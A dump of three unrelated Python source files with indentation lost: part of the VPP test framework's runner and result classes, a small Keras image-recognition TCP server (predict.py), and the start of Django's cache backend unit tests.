:param dst_index: destination interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info_for_interface(src_index, info)
if info is None:
return None
if info.dst == dst_index:
return info
def assert_equal(self, real_value, expected_value, name_or_class=None):
if name_or_class is None:
self.assertEqual(real_value, expected_value)
return
try:
msg = "Invalid %s: %d('%s') does not match expected value %d('%s')"
msg = msg % (getdoc(name_or_class).strip(),
real_value, str(name_or_class(real_value)),
expected_value, str(name_or_class(expected_value)))
except Exception:
msg = "Invalid %s: %s does not match expected value %s" % (
name_or_class, real_value, expected_value)
self.assertEqual(real_value, expected_value, msg)
def assert_in_range(self,
real_value,
expected_min,
expected_max,
name=None):
if name is None:
msg = None
else:
msg = "Invalid %s: %s out of range <%s,%s>" % (
name, real_value, expected_min, expected_max)
self.assertTrue(expected_min <= real_value <= expected_max, msg)
@classmethod
def sleep(cls, timeout, remark=None):
if hasattr(cls, 'logger'):
cls.logger.debug("Starting sleep for %ss (%s)" % (timeout, remark))
before = time.time()
time.sleep(timeout)
after = time.time()
if after - before > 2 * timeout:
cls.logger.error("unexpected time.sleep() result - "
"slept for %ss instead of ~%ss!" % (
after - before, timeout))
if hasattr(cls, 'logger'):
cls.logger.debug(
"Finished sleep (%s) - slept %ss (wanted %ss)" % (
remark, after - before, timeout))
def send_and_assert_no_replies(self, intf, pkts, remark=""):
self.vapi.cli("clear trace")
intf.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
timeout = 1
for i in self.pg_interfaces:
i.get_capture(0, timeout=timeout)
i.assert_nothing_captured(remark=remark)
timeout = 0.1
def send_and_expect(self, input, pkts, output):
self.vapi.cli("clear trace")
input.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = output.get_capture(len(pkts))
return rx
class TestCasePrinter(object):
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
if not hasattr(self, "_test_case_set"):
self._test_case_set = set()
def print_test_case_heading_if_first_time(self, case):
if case.__class__ not in self._test_case_set:
print(double_line_delim)
print(colorize(getdoc(case.__class__).splitlines()[0], YELLOW))
print(double_line_delim)
self._test_case_set.add(case.__class__)
class VppTestResult(unittest.TestResult):
"""
@property result_string
String variable to store the test case result string.
@property errors
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test which
raised an unexpected exception.
@property failures
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test where
a failure was explicitly signalled using the TestCase.assert*()
methods.
"""
def __init__(self, stream, descriptions, verbosity):
"""
:param stream File descriptor to store where to report test results.
Set to the standard error stream by default.
:param descriptions Boolean variable to store information if to use
test case descriptions.
:param verbosity Integer variable to store required verbosity level.
"""
unittest.TestResult.__init__(self, stream, descriptions, verbosity)
self.stream = stream
self.descriptions = descriptions
self.verbosity = verbosity
self.result_string = None
self.printer = TestCasePrinter()
def addSuccess(self, test):
"""
Record a test succeeded result
:param test:
"""
if hasattr(test, 'logger'):
test.logger.debug("--- addSuccess() %s.%s(%s) called"
% (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc))
unittest.TestResult.addSuccess(self, test)
self.result_string = colorize("OK", GREEN)
def addSkip(self, test, reason):
"""
Record a test skipped.
:param test:
:param reason:
"""
if hasattr(test, 'logger'):
test.logger.debug("--- addSkip() %s.%s(%s) called, reason is %s"
% (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc,
reason))
unittest.TestResult.addSkip(self, test, reason)
self.result_string = colorize("SKIP", YELLOW)
def symlink_failed(self, test):
logger = None
if hasattr(test, 'logger'):
logger = test.logger
if hasattr(test, 'tempdir'):
try:
failed_dir = os.getenv('VPP_TEST_FAILED_DIR')
link_path = '%s/%s-FAILED' % (failed_dir,
test.tempdir.split("/")[-1])
if logger:
logger.debug("creating a link to the failed test")
logger.debug("os.symlink(%s, %s)" %
(test.tempdir, link_path))
os.symlink(test.tempdir, link_path)
except Exception as e:
if logger:
logger.error(e)
def send_failure_through_pipe(self, test):
if hasattr(self, 'test_framework_failed_pipe'):
pipe = self.test_framework_failed_pipe
if pipe:
pipe.send(test.__class__)
def addFailure(self, test, err):
"""
Record a test failed result
:param test:
:param err: error message
"""
if hasattr(test, 'logger'):
test.logger.debug("--- addFailure() %s.%s(%s) called, err is %s"
% (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc, err))
test.logger.debug("formatted exception is:\n%s" %
"".join(format_exception(*err)))
unittest.TestResult.addFailure(self, test, err)
if hasattr(test, 'tempdir'):
self.result_string = colorize("FAIL", RED) + \
' [ temp dir used by test case: ' + test.tempdir + ' ]'
self.symlink_failed(test)
else:
self.result_string = colorize("FAIL", RED) + ' [no temp dir]'
self.send_failure_through_pipe(test)
def addError(self, test, err):
"""
Record a test error result
:param test:
:param err: error message
"""
if hasattr(test, 'logger'):
test.logger.debug("--- addError() %s.%s(%s) called, err is %s"
% (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc, err))
test.logger.debug("formatted exception is:\n%s" %
"".join(format_exception(*err)))
unittest.TestResult.addError(self, test, err)
if hasattr(test, 'tempdir'):
self.result_string = colorize("ERROR", RED) + \
' [ temp dir used by test case: ' + test.tempdir + ' ]'
self.symlink_failed(test)
else:
self.result_string = colorize("ERROR", RED) + ' [no temp dir]'
self.send_failure_through_pipe(test)
def getDescription(self, test):
"""
Get test description
:param test:
:returns: test description
"""
# TODO: if none print warning not raise exception
short_description = test.shortDescription()
if self.descriptions and short_description:
return short_description
else:
return str(test)
def startTest(self, test):
"""
Start a test
:param test:
"""
self.printer.print_test_case_heading_if_first_time(test)
unittest.TestResult.startTest(self, test)
if self.verbosity > 0:
self.stream.writeln(
"Starting " + self.getDescription(test) + " ...")
self.stream.writeln(single_line_delim)
def stopTest(self, test):
"""
Stop a test
:param test:
"""
unittest.TestResult.stopTest(self, test)
if self.verbosity > 0:
self.stream.writeln(single_line_delim)
self.stream.writeln("%-73s%s" % (self.getDescription(test),
self.result_string))
self.stream.writeln(single_line_delim)
else:
self.stream.writeln("%-73s%s" % (self.getDescription(test),
self.result_string))
def printErrors(self):
"""
Print errors from running the test case
"""
self.stream.writeln()
self.printErrorList('ERROR', self.errors)
self.printErrorList('FAIL', self.failures)
def printErrorList(self, flavour, errors):
"""
Print error list to the output stream together with error type
and test case description.
:param flavour: error type
:param errors: iterable errors
"""
for test, err in errors:
self.stream.writeln(double_line_delim)
self.stream.writeln("%s: %s" %
(flavour, self.getDescription(test)))
self.stream.writeln(single_line_delim)
self.stream.writeln("%s" % err)
class Filter_by_test_option:
def __init__(self, filter_file_name, filter_class_name, filter_func_name):
self.filter_file_name = filter_file_name
self.filter_class_name = filter_class_name
self.filter_func_name = filter_func_name
def __call__(self, file_name, class_name, func_name):
if self.filter_file_name and file_name != self.filter_file_name:
return False
if self.filter_class_name and class_name != self.filter_class_name:
return False
if self.filter_func_name and func_name != self.filter_func_name:
return False
return True
class VppTestRunner(unittest.TextTestRunner):
"""
A basic test runner implementation which prints results to standard error.
"""
@property
def resultclass(self):
"""Class maintaining the results of the tests"""
return VppTestResult
def __init__(self, keep_alive_pipe=None, failed_pipe=None,
stream=sys.stderr, descriptions=True,
verbosity=1, failfast=False, buffer=False, resultclass=None):
# ignore stream setting here, use hard-coded stdout to be in sync
# with prints from VppTestCase methods ...
super(VppTestRunner, self).__init__(sys.stdout, descriptions,
verbosity, failfast, buffer,
resultclass)
reporter = KeepAliveReporter()
reporter.pipe = keep_alive_pipe
# this is super-ugly, but very simple to implement and works as long
# as we run only one test at the same time
VppTestResult.test_framework_failed_pipe = failed_pipe
test_option = "TEST"
def parse_test_option(self):
f = os.getenv(self.test_option, None)
filter_file_name = None
filter_class_name = None
filter_func_name = None
if f:
if '.' in f:
parts = f.split('.')
if len(parts) > 3:
raise Exception("Unrecognized %s option: %s" %
(self.test_option, f))
if len(parts) > 2:
if parts[2] not in ('*', ''):
filter_func_name = parts[2]
if parts[1] not in ('*', ''):
filter_class_name = parts[1]
if parts[0] not in ('*', ''):
if parts[0].startswith('test_'):
filter_file_name = parts[0]
else:
filter_file_name = 'test_%s' % parts[0]
else:
if f.startswith('test_'):
filter_file_name = f
else:
filter_file_name = 'test_%s' % f
return filter_file_name, filter_class_name, filter_func_name
@staticmethod
def filter_tests(tests, filter_cb):
result = unittest.suite.TestSuite()
for t in tests:
if isinstance(t, unittest.suite.TestSuite):
# this is a bunch of tests, recursively filter...
x = VppTestRunner.filter_tests(t, filter_cb)
if x.countTestCases() > 0:
result.addTest(x)
elif isinstance(t, unittest.TestCase):
# this is a single test
parts = t.id().split('.')
# t.id() for common cases like this:
# test_classifier.TestClassifier.test_acl_ip
# apply filtering only if it is so
if len(parts) == 3:
if not filter_cb(parts[0], parts[1], parts[2]):
continue
result.addTest(t)
else:
# unexpected object, don't touch it
result.addTest(t)
return result
def run(self, test):
"""
Run the tests
:param test:
"""
faulthandler.enable() # emit stack trace to stderr if killed by signal
print("Running tests using custom test runner") # debug message
filter_file, filter_class, filter_func = self.parse_test_option()
print("Active filters: file=%s, class=%s, function=%s" % (
filter_file, filter_class, filter_func))
filter_cb = Filter_by_test_option(
filter_file, filter_class, filter_func)
filtered = self.filter_tests(test, filter_cb)
print("%s out of %s tests match specified filters" % (
filtered.countTestCases(), test.countTestCases()))
if not running_extended_tests():
print("Not running extended tests (some tests will be skipped)")
return super(VppTestRunner, self).run(filtered)
class Worker(Thread):
def __init__(self, args, logger, env={}):
self.logger = logger
self.args = args
self.result = None
self.env = copy.deepcopy(env)
super(Worker, self).__init__()
def run(self):
executable = self.args[0]
self.logger.debug("Running executable w/args `%s'" % self.args)
env = os.environ.copy()
env.update(self.env)
env["CK_LOG_FILE_NAME"] = "-"
self.process = subprocess.Popen(
self.args, shell=False, env=env, preexec_fn=os.setpgrp,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = self.process.communicate()
self.logger.debug("Finished running `%s'" % executable)
self.logger.info("Return code is `%s'" % self.process.returncode)
self.logger.info(single_line_delim)
self.logger.info("Executable `%s' wrote to stdout:" % executable)
self.logger.info(single_line_delim)
self.logger.info(out)
self.logger.info(single_line_delim)
self.logger.info("Executable `%s' wrote to stderr:" % executable)
self.logger.info(single_line_delim)
self.logger.info(err)
self.logger.info(single_line_delim)
self.result = self.process.returncode
|
predict.py
|
from keras.models import load_model
from vis.utils import utils
import os
import numpy as np
import json
import tensorflow as tf
import time
import socket
import threading
import uuid
from sqldb import inserst
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.2
session = tf.Session(config=config)
model = load_model("all_group_299v4.h5")
with open("all_group_299v4.json", 'r') as load_f:
load_dict = json.load(load_f)
testimg = np.zeros((1,299,299,3)).astype('float32')/255
model.predict(testimg)
print("model is ok")
SIZE = 1024*1024
hostname = socket.gethostname()#本地hsotname
ip = socket.gethostbyname(hostname)#本地ip
port = 666
address = (ip, port)
socket01 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# AF_INET:默認IPv4, SOCK_STREAM:TCP
socket01.bind(address) # 讓這個socket要綁到位址(ip/port)
socket01.listen(2) # listen(backlog)
print('Socket Startup')
def recognition(img,conn,x):
Stime = time.time()
img = 'upload/'+x+".jpg"
print(img)
img1 = utils.load_img(img, target_size=(299, 299))
im_normal2 = img1.reshape(1, img1.shape[0], img1.shape[1], img1.shape[2]).astype('float32')/255
probabilities = model.predict(im_normal2)
predict = np.argmax(probabilities, axis=1)
i = predict
'''print("class: %s, acc: %.2f" % (list(load_dict.keys())[list(load_dict.values()).index(i)],
(probabilities[0][i])))'''
data_to_client = {'class': list(load_dict.keys())[list(load_dict.values()).index(i)], 'acc': (probabilities[0][i])}
conn.send(bytes(data_to_client['class'], encoding="utf8"))
print(data_to_client['class'],data_to_client['acc'])
#寫入資料庫
inserst(i, img)
Etime = time.time()
print("spend: %f" % (Etime - Stime) + 's')
return
# 刪除相同名稱檔案
def checkFile():
list = os.listdir('.')
for iterm in list:
if iterm == 'upload/image.jpg':
os.remove(iterm)
#print ("remove")
else:
pass
def recvImage(conn,x):
while True:
imgData = conn.recv(SIZE)
if not imgData:
break
else:
with open('upload/'+x+'.jpg', 'ab') as f:
f.write(imgData)
return x
#新增線程
def saveImage(conn,x):
checkFile()
t = threading.Thread(target = recvImage, args = (conn,x))
t.setDaemon(True)
t.start()
t.join()
def tcplink(conn, addr):
conn.send(b"1:")
print('begin write image file')
x = str(uuid.uuid1())
saveImage(conn,x)
img = "test"
recognition(img,conn,x)
conn.close()
while True:
conn, addr = socket01.accept()
t = threading.Thread(target = tcplink, args = (conn, addr))
t.start()
#print('Connected by', addr)
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import os
import re
import copy
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management
from django.core.cache import (cache, caches, CacheKeyWarning,
InvalidCacheBackendError, DEFAULT_CACHE_ALIAS)
from django.db import connection, connections, router, transaction
from django.core.cache.utils import make_template_fragment_key
from django.http import HttpResponse, StreamingHttpResponse
from django.middleware.cache import (FetchFromCacheMiddleware,
UpdateCacheMiddleware, CacheMiddleware)
from django.template import Template
from django.template.response import TemplateResponse
from django.test import TestCase, TransactionTestCase, RequestFactory, override_settings
from django.test.utils import IgnoreDeprecationWarningsMixin
from django.utils import six
from django.utils import timezone
from django.utils import translation
from django.utils.cache import (patch_vary_headers, get_cache_key,
learn_cache_key, patch_cache_control, patch_response_headers)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpickable(object):
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(TestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertEqual(cache.get("key"), None)
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertEqual(result, True)
self.assertEqual(cache.get("addkey1"), None)
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertEqual(cache.get("does_not_exist"), None)
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), None)
cache.delete("key1")
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertEqual(cache.has_key("hello1"), False)
self.assertEqual(cache.has_key("goodbye1"), False)
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertEqual("hello2" in cache, False)
self.assertEqual("goodbye2" in cache, False)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), None)
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertEqual(cache.get("expire1"), None)
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), None)
self.assertEqual(cache.has_key("expire3"), False)
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), None)
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = dict((k, base.copy()) for k in _caches_setting_base.keys())
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertEqual(result, False)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertEqual(cache.get("does_not_exist"), None)
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertEqual(cache.has_key("hello1"), True)
self.assertEqual(cache.has_key("goodbye1"), False)
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertEqual("hello2" in cache, True)
self.assertEqual("goodbye2" in cache, False)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertEqual(cache.get("expire1"), None)
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertEqual(cache.has_key("expire3"), False)
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in zero into timeout results in a value that is not cached
'''
cache.set('key1', 'eggs', 0)
self.assertEqual(cache.get('key1'), None)
cache.add('key2', 'ham', 0)
self.assertEqual(cache.get('key2'), None)
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertEqual(cache.get('key3'), None)
self.assertEqual(cache.get('key4'), None)
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count = count + 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def test_invalid_keys(self):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached does not allow whitespace or control characters in keys
cache.set('key with spaces', 'value')
self.assertEqual(len(w), 2)
self.assertIsInstance(w[0].message, CacheKeyWarning)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached limits key length to 250
cache.set('a' * 251, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
finally:
cache.key_func = old_func
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertEqual(cache.get('answer1', version=2), None)
self.assertEqual(caches['v2'].get('answer1'), None)
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertEqual(caches['v2'].get('answer1', version=2), None)
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertEqual(cache.get('answer2'), None)
self.assertEqual(cache.get('answer2', version=1), None)
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertEqual(cache.get('answer3'), None)
self.assertEqual(cache.get('answer3', version=1), None)
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertEqual(caches['v2'].get('answer3', version=1), None)
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertEqual(cache.get('answer4', version=2), None)
self.assertEqual(caches['v2'].get('answer4'), None)
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertEqual(caches['v2'].get('answer4', version=2), None)
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
